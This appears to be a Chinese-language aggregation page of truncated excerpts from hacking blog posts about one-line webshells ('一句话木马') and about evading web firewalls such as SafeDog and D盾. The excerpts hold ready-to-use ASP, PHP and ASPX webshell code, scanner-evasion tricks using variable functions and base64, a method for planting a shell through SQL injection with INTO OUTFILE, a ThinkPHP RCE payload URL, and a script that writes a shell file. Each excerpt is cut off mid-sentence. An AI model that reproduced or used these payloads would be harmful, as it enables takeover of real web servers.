hi,我是凉风,(以下内容纯属个人见解,如有不同的意见欢迎回复指出) ,本菜比发现aspx过狗的姿势不常见,不像php一样一抓一大把,于是我决定研究一下aspx 本文作者:i春秋签约作家——凉风 引用i春秋作家团大佬@非主流  对一句话木马的理解: 一句话木马的意思就是,我们制造了一个包含远程代码执行漏洞的web页面. 目录:0×01:我没有aspx代码编写基础,我该从哪入手?0×02:正式开始:从过狗菜刀配置文件里寻找思路0×03:再写一个:分析各种拦截机制,一一绕过0×04:总结 0×01:…
代码: import time import os from threading import Thread import optparse def aspyijuhua(): try: juy=open('caidao.asp','w') asp="<%IfRequest(",'1',")<>""ThenExecuteGlobal(Request(",'1',"))%>" print '[+]Acce…
首先一句话木马: <?php assert($_POST['a']); ?> D盾扫描,5级 分开写: <?php $a = "assert"; $b = $_POST['a']; $a($b); ?> D盾扫描,4级 使用可变函数的技巧(PHP 支持可变函数的概念.这意味着如果一个变量名后有圆括号,PHP 将寻找与变量的值同名的函数,并且尝试执行它.可变函数可以用来实现包括回调函数,函数表在内的一些用途) <?php $a = "assert&…
aspx木马收集: <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%> 随日期变化的连接密码, Asp.NET服务端写法: <%@ Page Language="Jscript"%><%eval(Request.Item[FormsAuthentication.HashPasswordForS…
讲一下SQL注入中写一句话拿webshell的原理,主要使用的是 SELECT ... INTO OUTFILE 这个语句,下面是一个语句的例子: SELECT * INTO OUTFILE 'C:\log1.txt'     这样就可以把查询到的数据写入到C盘的log1.txt这个文件里面.利用这个原理我们可以把PHP的一句话木马写到磁盘上从而拿到webshell.   本地的目标站点来实战一下,我们的目的是在目标的物理路径D:/WWW/下面生成一个php文件,从而可以使我们用菜刀连接上去:…
一句话木马: 1. #asp <%execute(request("pass"))%> 2. #php <?php eval($_POST[pass]);?> 3. #ASPX <% @Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%> 将木马上传后使用菜刀等工具链接即可…
00x01安全狗的确是让人很头痛,尤其是在上传一句话或者写入一句话的时候,会被安全狗拦截从而拿不下shell.当然,安全狗是最简单的一款waf,很容易就进行一个绕过.00x02对于绕过安全狗跟360,我姿势不多,但是却很实用为以下两种 1.#可变变量2.#引用变量 00x03##可变变量(菜刀可能报错)<@eval($_POST['x'])复制代码 经常使用的人都知道,只是最简单的一句话,不过任何waf与规则我们先来加入需要的函数<?php$a='b';$b=$_POST['x'];@eval…
环境: Thinkphp 5.0.15 PHP version:7.0.12 WAF: D盾 ,安全狗 Thinkphp 采用 MVC 模式  核心:模块 -> 控制器 –> 方法 思路:利用已经有的think 类包库 去做一些事情 利用已有的功能,顺便对D盾 绕过 方法: Payload1: http://127.0.0.1/tp5.0.15/public/index.php/index?&f=call_user_func&shell[0]=assert&shell[…
一.基础类的一句话--功能仅限于验证漏洞了,实际中太容易被查出出来: <?php @eval($_GET["code"])?> <?php @system($_POST["cmd"])?> 相信一目了然可以看懂如何使用这类一句话. 如果有疑问可以看我的博客PHP后门的eval类和system类 函数到底有哪些区别 二.编码的替换的类型: <?php @fputs(fopen(base64_decode('bG9zdC5waHA='),w…
一.基础类的一句话--功能仅限于验证漏洞了,实际中太容易被查出出来: 1 <?php @eval($_GET["code"])?> 2 <?php @system($_POST["cmd"])?> 相信一目了然可以看懂如何使用这类一句话.参考博主(https://www.cnblogs.com/KevinGeorge/)的博文 二.编码的替换的类型: 1 <?php @fputs(fopen(base64_decode('bG9zdC5…